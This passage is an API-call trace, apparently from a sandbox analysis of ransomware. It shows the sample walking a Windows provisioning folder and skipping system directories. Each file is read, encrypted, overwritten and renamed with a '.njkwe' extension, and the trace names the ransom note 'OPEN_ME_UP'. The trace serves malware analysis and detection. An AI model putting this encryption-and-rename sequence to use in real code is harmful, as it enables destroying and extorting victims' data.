(lpString1="283__Connections_Cellular_KPN-Hi (Netherlands)_i15$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.982] lstrcmpW (lpString1="283__Connections_Cellular_KPN-Hi (Netherlands)_i15$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.982] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\283__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.982] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\283__Connections_Cellular_KPN-Hi (Netherlands)_i15$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\283__connections_cellular_kpn-hi (netherlands)_i15$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.982] GetTickCount () returned 0x1153d44 [0077.982] GetTickCount () returned 0x1153d44 [0077.982] GetTickCount () returned 0x1153d44 [0077.982] GetTickCount () returned 0x1153d44 [0077.982] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.983] GetProcessHeap () returned 0xbe0000 [0077.983] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.983] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2df, lpOverlapped=0x0) returned 1 [0077.989] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.989] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2df, lpOverlapped=0x0) returned 1 [0077.989] GetProcessHeap () returned 0xbe0000 [0077.989] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.989] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.989] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.990] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.990] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.990] CloseHandle (hObject=0x43c) returned 1 [0077.990] GetProcessHeap () returned 0xbe0000 [0077.990] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.990] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\283__Connections_Cellular_KPN-Hi (Netherlands)_i15$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0077.990] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\283__Connections_Cellular_KPN-Hi (Netherlands)_i15$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\283__connections_cellular_kpn-hi (netherlands)_i15$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\283__Connections_Cellular_KPN-Hi (Netherlands)_i15$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\283__connections_cellular_kpn-hi (netherlands)_i15$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.990] GetProcessHeap () returned 0xbe0000 [0077.991] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.991] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90aa0698, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90aa0698, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90aa0698, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="284__Connections_Cellular_KPN-Hi (Netherlands)_i2$(__MVID)@WAP.provxml", cAlternateFileName="284__C~1.PRO")) returned 1 [0077.991] lstrcmpiW (lpString1="284__Connections_Cellular_KPN-Hi (Netherlands)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.991] lstrcmpiW (lpString1="284__Connections_Cellular_KPN-Hi (Netherlands)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.991] lstrcmpiW (lpString1="284__Connections_Cellular_KPN-Hi (Netherlands)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.991] lstrcmpiW (lpString1="284__Connections_Cellular_KPN-Hi (Netherlands)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.991] lstrcmpiW (lpString1="284__Connections_Cellular_KPN-Hi (Netherlands)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.991] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\284__Connections_Cellular_KPN-Hi (Netherlands)_i2$(__MVID)@WAP.provxml") returned 164 [0077.991] StrStrIW (lpFirst="284__Connections_Cellular_KPN-Hi (Netherlands)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.991] lstrcmpW (lpString1="284__Connections_Cellular_KPN-Hi (Netherlands)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.991] lstrcmpW (lpString1="284__Connections_Cellular_KPN-Hi (Netherlands)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.991] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\284__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.991] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\284__Connections_Cellular_KPN-Hi (Netherlands)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\284__connections_cellular_kpn-hi (netherlands)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.991] GetTickCount () returned 0x1153d44 [0077.991] GetTickCount () returned 0x1153d44 [0077.991] GetTickCount () returned 0x1153d44 [0077.991] GetTickCount () returned 0x1153d44 [0077.991] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.992] GetProcessHeap () returned 0xbe0000 [0077.992] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.992] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0077.997] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.997] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0077.997] GetProcessHeap () returned 0xbe0000 [0077.997] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.997] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.997] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.997] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.997] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.997] CloseHandle (hObject=0x43c) returned 1 [0077.997] GetProcessHeap () returned 0xbe0000 [0077.997] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.997] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\284__Connections_Cellular_KPN-Hi (Netherlands)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0077.997] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\284__Connections_Cellular_KPN-Hi (Netherlands)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\284__connections_cellular_kpn-hi (netherlands)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\284__Connections_Cellular_KPN-Hi (Netherlands)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\284__connections_cellular_kpn-hi (netherlands)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.998] GetProcessHeap () returned 0xbe0000 [0077.998] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.998] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90aa0698, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90aa0698, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90aa0698, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="285__Connections_Cellular_KPN-Hi (Netherlands)_i3$(__MVID)@WAP.provxml", cAlternateFileName="285__C~1.PRO")) returned 1 [0077.998] lstrcmpiW (lpString1="285__Connections_Cellular_KPN-Hi (Netherlands)_i3$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.998] lstrcmpiW (lpString1="285__Connections_Cellular_KPN-Hi (Netherlands)_i3$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.998] lstrcmpiW (lpString1="285__Connections_Cellular_KPN-Hi (Netherlands)_i3$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.998] lstrcmpiW (lpString1="285__Connections_Cellular_KPN-Hi (Netherlands)_i3$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.998] lstrcmpiW (lpString1="285__Connections_Cellular_KPN-Hi (Netherlands)_i3$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.998] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\285__Connections_Cellular_KPN-Hi (Netherlands)_i3$(__MVID)@WAP.provxml") returned 164 [0077.998] StrStrIW (lpFirst="285__Connections_Cellular_KPN-Hi (Netherlands)_i3$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.998] lstrcmpW (lpString1="285__Connections_Cellular_KPN-Hi (Netherlands)_i3$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.998] lstrcmpW (lpString1="285__Connections_Cellular_KPN-Hi (Netherlands)_i3$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.999] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\285__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.999] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\285__Connections_Cellular_KPN-Hi (Netherlands)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\285__connections_cellular_kpn-hi (netherlands)_i3$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.999] GetTickCount () returned 0x1153d53 [0077.999] GetTickCount () returned 0x1153d53 [0077.999] GetTickCount () returned 0x1153d53 [0077.999] GetTickCount () returned 0x1153d53 [0077.999] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.999] GetProcessHeap () returned 0xbe0000 [0077.999] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.999] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0078.002] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.002] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0078.002] GetProcessHeap () returned 0xbe0000 [0078.002] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.002] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.002] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.003] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.003] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.003] CloseHandle (hObject=0x43c) returned 1 [0078.003] GetProcessHeap () returned 0xbe0000 [0078.003] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.003] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\285__Connections_Cellular_KPN-Hi (Netherlands)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0078.003] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\285__Connections_Cellular_KPN-Hi (Netherlands)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\285__connections_cellular_kpn-hi (netherlands)_i3$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\285__Connections_Cellular_KPN-Hi (Netherlands)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\285__connections_cellular_kpn-hi (netherlands)_i3$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.003] GetProcessHeap () returned 0xbe0000 [0078.003] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.004] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ac6903, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ac6903, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ac6903, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="286__Connections_Cellular_KPN-Hi (Netherlands)_i4$(__MVID)@WAP.provxml", cAlternateFileName="286__C~1.PRO")) returned 1 [0078.004] lstrcmpiW (lpString1="286__Connections_Cellular_KPN-Hi (Netherlands)_i4$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.004] lstrcmpiW (lpString1="286__Connections_Cellular_KPN-Hi (Netherlands)_i4$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.004] lstrcmpiW (lpString1="286__Connections_Cellular_KPN-Hi (Netherlands)_i4$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.004] lstrcmpiW (lpString1="286__Connections_Cellular_KPN-Hi (Netherlands)_i4$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.004] lstrcmpiW (lpString1="286__Connections_Cellular_KPN-Hi (Netherlands)_i4$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.004] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\286__Connections_Cellular_KPN-Hi (Netherlands)_i4$(__MVID)@WAP.provxml") returned 164 [0078.004] StrStrIW (lpFirst="286__Connections_Cellular_KPN-Hi (Netherlands)_i4$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.004] lstrcmpW (lpString1="286__Connections_Cellular_KPN-Hi (Netherlands)_i4$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.004] lstrcmpW (lpString1="286__Connections_Cellular_KPN-Hi (Netherlands)_i4$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.004] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\286__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.004] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\286__Connections_Cellular_KPN-Hi (Netherlands)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\286__connections_cellular_kpn-hi (netherlands)_i4$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.007] GetTickCount () returned 0x1153d53 [0078.008] GetTickCount () returned 0x1153d53 [0078.008] GetTickCount () returned 0x1153d53 [0078.008] GetTickCount () returned 0x1153d53 [0078.008] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.008] GetProcessHeap () returned 0xbe0000 [0078.008] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.008] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d9, lpOverlapped=0x0) returned 1 [0078.009] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.010] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d9, lpOverlapped=0x0) returned 1 [0078.010] GetProcessHeap () returned 0xbe0000 [0078.010] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.010] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.010] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.010] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.010] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.010] CloseHandle (hObject=0x43c) returned 1 [0078.010] GetProcessHeap () returned 0xbe0000 [0078.010] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.010] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\286__Connections_Cellular_KPN-Hi (Netherlands)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0078.010] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\286__Connections_Cellular_KPN-Hi (Netherlands)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\286__connections_cellular_kpn-hi (netherlands)_i4$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\286__Connections_Cellular_KPN-Hi (Netherlands)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\286__connections_cellular_kpn-hi (netherlands)_i4$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.011] GetProcessHeap () returned 0xbe0000 [0078.011] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.011] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ac6903, 